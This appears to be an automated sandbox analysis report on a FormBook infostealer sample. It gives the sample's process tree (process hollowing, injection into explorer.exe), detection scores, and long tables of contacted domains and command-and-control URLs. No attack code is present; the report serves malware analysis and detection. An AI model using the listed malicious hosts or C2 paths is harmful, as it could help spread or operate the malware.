Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1524408 | Sample: VFylJFPzqX.exe | Start date: 02/10/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts: www.mlharquitectura.com; www.history-poker.site; 7 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

VFylJFPzqX.exe (started)
  dropped: C:\Users\user\AppData\...\VFylJFPzqX.exe.log (ASCII); C:\Users\user\AppData\...\AddInProcess32.exe (PE32)
  signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
  AddInProcess32.exe (started)
    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 4 other signatures
    explorer.exe (injected)
      network: td-ccm-neg-87-45.wixdns.net 34.149.87.45, 49714, 80, ATGS-MMD-ASUS, United States
      cmmon32.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
        explorer.exe (started)
          signatures: Query firmware table information (likely to detect VMs)
        cmd.exe (started)
          conhost.exe (started)
      WerFault.exe (started)

Source | Detection | Scanner | Label | Link
VFylJFPzqX.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
VFylJFPzqX.exe | 100% | Avira | HEUR/AGEN.1309628
VFylJFPzqX.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://excel.office.com | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://outlook.com | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
brasilbikeshopsc.com | 191.252.4.20 | true | true | - | unknown
td-ccm-neg-87-45.wixdns.net | 34.149.87.45 | true | true | - | unknown
www.mlharquitectura.com | unknown | unknown | true | - | unknown
www.creatievecontentpeople.com | unknown | unknown | true | - | unknown
www.history-poker.site | unknown | unknown | true | - | unknown
www.cargizmos.net | unknown | unknown | true | - | unknown
api.msn.com | unknown | unknown | true | - | unknown
www.brasilbikeshopsc.com | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.mlharquitectura.com/igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy&Rl=YTFLi4d0T2 | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://powerpoint.office.comer | explorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://www.mckinleyint.com/igbn/www.livewey.net | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.123-tecnicos.com/igbn/www.s5agents.com | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://www.bangunrumahkreasi.comReferer: | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://www.prolongdogslife.comReferer: | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
https://android.notify.windows.com/iOSA4 | explorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://www.s5agents.com/igbn/www.getrightspt.com | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://www.webinarcerdaskanindonesia.com/igbn/ | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.nftcopyrights.xyzReferer: | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.itk.world/igbn/www.betmonde396.com | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000004.00000003.2284166438.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | -
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.creatingsobriety.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.creatingsobriety.com/igbn/www.rusticramble.onlineexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.itk.world/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000010.00000002.2678982121.0000000009FA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.freakyressop.xyzReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://excel.office.comexplorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.00000000093CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.gbraises.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.rumblerain.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.bangunrumahkreasi.com/igbn/www.freakyressop.xyzexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.livewey.net/igbn/www.freakyressop.xyzexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.noticeupluy.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.azure1224.xyzexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.brasilbikeshopsc.comReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://api.msn.com/RV9cuexplorer.exe, 00000010.00000003.2437268910.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.brasilbikeshopsc.com/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.mckinleyint.com/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://www.gbraises.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://www.prolongdogslife.com/igbn/www.enet-insaat.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.cargizmos.net/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://www.microsoft.cexplorer.exe, 00000004.00000003.2284166438.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.bangunrumahkreasi.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://www.s5agents.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.fliptrade.cfd/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://android.notify.windows.com/iOSdexplorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.history-poker.siteexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.monicadenis.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://www.msn.com/en-us/money/careersandeducation/the-no-1-question-to-ask-in-a-job-interview-accoexplorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000002.2362200277.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.monicadenis.com/igbn/www.mckinleyint.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://word.office.comexplorer.exe, 00000010.00000003.2435222772.0000000009459000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.creatievecontentpeople.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.gbraises.com/igbn/www.bangunrumahkreasi.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.rumblerain.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.azure1224.xyzReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://outlook.comEexplorer.exe, 00000010.00000003.2435222772.0000000009459000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.freakyressop.xyz/igbn/www.rusticramble.onlineexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.creatingsobriety.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://www.history-poker.siteReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.creatievecontentpeople.com/igbn/www.itk.worldexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.history-poker.site/igbn/www.brasilbikeshopsc.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://outlook.comexplorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.prolongdogslife.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.noticeupluy.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.enet-insaat.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.betmonde396.comReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.monicadenis.com/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.creatievecontentpeople.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
URL | Source | Malicious | Antivirus Detection | Reputation
(previous row, continued) | | | URL Reputation: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | explorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2368129929.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289901418.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.cargizmos.netReferer: | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.nftcopyrights.xyz/igbn/ | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.mlharquitectura.com | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.mlharquitectura.com/igbn/ | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.freakyressop.xyz/igbn/ | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.freakyressop.xyz/igbn/www.nftcopyrights.xyz | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.azure1224.xyz/igbn/www.musiclessonsandmore.com | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
